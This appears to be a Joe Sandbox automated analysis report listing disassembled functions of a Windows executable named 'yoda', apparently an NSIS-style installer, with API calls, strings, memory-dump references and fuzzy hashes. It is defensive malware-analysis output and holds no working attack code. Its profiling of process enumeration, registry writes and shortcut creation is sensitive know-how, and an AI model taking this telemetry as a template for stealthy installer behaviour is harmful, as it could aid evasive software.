                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                  • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                • String ID: F$N$open
                                                                                                                                                                                                                                                                • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                • String ID: F
                                                                                                                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
